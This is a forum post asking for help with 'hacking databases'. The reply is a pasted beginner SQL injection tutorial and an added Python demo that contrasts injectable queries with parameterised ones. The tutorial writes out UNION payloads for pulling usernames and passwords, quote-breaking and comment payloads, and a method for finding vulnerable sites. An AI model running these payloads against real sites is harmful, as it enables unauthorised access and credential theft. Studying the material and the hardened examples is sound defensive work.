sql inject
5 Sep 2012, 07:52
Journals
Anyone who knows something about SQL injection, or hacking databases?
Please /q Halidith on #gamehosting or PM on CF.
GOOGLE
-By: Mark IJbema (Vandread)-
-Purpose of this manual
The purpose of this manual is to explain SQL injection clearly for beginners.
For questions and comments: [email protected]
-Conventions
In a URL all special characters should be URI-encoded (%.. characters), and the braces themselves must not be typed in; for legibility this tutorial does not do that (hopefully browsers handle the encoding automatically for everything except the '=' character; if you encode that one yourself (%3D) it should work).
-What is SQL
SQL is a language for accessing databases. There are commands both to request things and to change things. Requesting things is done as follows:
SELECT <kolommen>
FROM <tabellen>
WHERE <voorwaarden>
So for example:
SELECT name, description, price
FROM products
WHERE name = '128MB RAM'
This gives you the name, description and price of 128MB RAM. However, since you usually want only one result, and a name is not necessarily unique, unique IDs are often used. So if the ID of 128MB RAM is 12, the query (as a selection in SQL is called) looks as follows:
SELECT name, description, price
FROM products
WHERE id = 12
Furthermore there is also UPDATE and the like for modifying things, but it goes too far to go deeper into that here.
-Using SQL from websites
Suppose you have a webpage that displays product data. It receives the id of the product as a parameter. The URL of the page looks as follows:
http://www.example.com/product.php?id=12
The PHP code then puts the id into the query. The id is in $id, and the query is as follows:
$query = "SELECT name, description, price FROM products WHERE id = $id"
which with 12 as $id results in:
SELECT name, description, price FROM products WHERE id = 12
which is a perfectly valid query. But people forget to check whether $id is a number, and if we replace the 12 with something else, that something else ends up in the query instead of 12. So for example:
http://www.example.com/product.php?id=onzin
gives
SELECT name, description, price FROM products WHERE id = onzin
and you probably get an error like "onzin is not a number". But you can also extend the SQL, for example:
http://www.example.com/product.php?id={666666 OR id = 13}
yields:
SELECT name, description, price FROM products WHERE id = 666666 OR id = 13
and now you get to see product 13 (assuming 666666 is not a valid id).
-Union
One of the most important techniques in SQL injection is the UNION operator. In the previous example you can adjust what you want, but as output you always get a name, a description and a price. That is usually not interesting. Suppose the same database also contains usernames, ids and passwords; then you really want to have those. You could do that with the following query:
SELECT username, password FROM users WHERE id = 1
The UNION operator exists in SQL to glue queries together, provided that the number of columns of the two queries is equal and the types of the results are pairwise equal (string, int, etc.). So to stick the previous query onto the product query we must add an extra integer column (assuming the price is stored as an integer in the database). The query with the union then looks as follows:
SELECT name, description, price FROM products WHERE id = 12
UNION
SELECT username, password, id FROM users WHERE id = 1
By using a nonexistent ID instead of 12, the first query is empty and the result consists only of the second query. So:
SELECT name, description, price FROM products WHERE id = 666666
UNION
SELECT username, password, id FROM users WHERE id = 1
We get this query using the following URL:
http://www.example.com/product.php?id={666666 UNION SELECT username, password, id FROM users WHERE id = 1}
So we can read a user's password. If you want the password and username of all users, you can write a script that retrieves this page for all IDs, parses the page, and displays the output in a nice format.
-Strings
Often, instead of IDs or other numbers, strings are passed, for example:
http://www.example.com/listusers?name=mark
which displays the list of all users called mark. Internally this looks something like:
SELECT ... FROM ... WHERE ... AND name = 'mark' AND ...
Now we do not want all users with the name 'mark', but those with the password 'wachtwoord'. So we want to make the following query:
SELECT ... FROM ...
WHERE ... AND name = 'onzin' OR password = 'wachtwoord' AND ...
which we get with the following URL:
http://www.example.com/listusers?name={onzin' OR password='wachtwoord}
Sometimes it is convenient to ignore the last part by turning it into a comment; the query then becomes:
SELECT ... FROM ...
WHERE ... AND name = 'onzin' OR password = 'wachtwoord'-- AND ...
And the URL:
http://www.example.com/listusers?name={onzin' OR password='wachtwoord'--}
-Test if a site is susceptible to SQL injection
The simplest way to test whether a site is vulnerable to SQL injection is to add a single quote to a variable in the query string. If a database error then occurs, the site is vulnerable. If no error occurs, the site may still be vulnerable, but there is probably magic_quotes or something similar in place. In that case you can still do SQL injection, but you cannot use quotes in doing so.
-Closing
This is roughly the basics, but there is a lot more to do; much depends on your own creativity, and the most useful things are often server-dependent (on MS SQL Server, for instance, you can (depending on how it is configured) send e-mails). I hope this is enough to get you started; the rest should work out with enough creativity combined with scripting skills (to automate things). Also interesting are the database-specific tables that contain meta-information (table names, column names, etc.).
-Sources
http://www.hackinthebox.org/print.php?sid=6899
Here u go!
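The product.php and listusers patterns from the pasted manual, reproduced in Python against an in-memory SQLite database with constructed sample rows, each beside the hardened form (type check plus bound parameters) that stops the same input. This is an added example, not part of the original post or the manual; the table contents, the password value and the function names are assumptions.

```python
import sqlite3

# Constructed sample data standing in for the manual's products and users tables.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, description TEXT, price INTEGER);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO products VALUES (12, '128MB RAM', 'memory module', 30);
        INSERT INTO products VALUES (13, '256MB RAM', 'memory module', 55);
        INSERT INTO users VALUES (1, 'admin', 'example-secret');
    """)
    return conn

# The manual's UNION input: an id that matches nothing, then a second SELECT with
# three type-compatible columns. The string input closes the quote and adds OR.
UNION_PAYLOAD = "666666 UNION SELECT username, password, id FROM users WHERE id = 1"
QUOTE_PAYLOAD = "nonsense' OR password = 'example-secret"

def product_vulnerable(conn, raw_id):
    # Mirrors the manual's $query: the parameter is pasted into the SQL text,
    # so anything after the number is executed as SQL.
    sql = f"SELECT name, description, price FROM products WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()

def product_safe(conn, raw_id):
    # Hardened form: enforce the integer type the manual says was never checked,
    # then bind the value so the driver treats it as data, never as SQL.
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT name, description, price FROM products WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()

def list_users_vulnerable(conn, raw_name):
    # Same defect for a string parameter: a quote in the input ends the literal.
    sql = f"SELECT username FROM users WHERE username = '{raw_name}'"
    return conn.execute(sql).fetchall()

def list_users_safe(conn, raw_name):
    # With a bound parameter the quote stays inside the compared string value.
    sql = "SELECT username FROM users WHERE username = ?"
    return conn.execute(sql, (raw_name,)).fetchall()

if __name__ == "__main__":
    conn = build_db()
    print(product_vulnerable(conn, UNION_PAYLOAD))     # leaks the users row
    print(list_users_vulnerable(conn, QUOTE_PAYLOAD))  # returns 'admin'
    print(list_users_safe(conn, QUOTE_PAYLOAD))        # [] : treated as a name
```

Note that the bound-parameter version also covers the numeric case the manual mentions for magic_quotes, where escaping quotes does nothing because the injected text needs none.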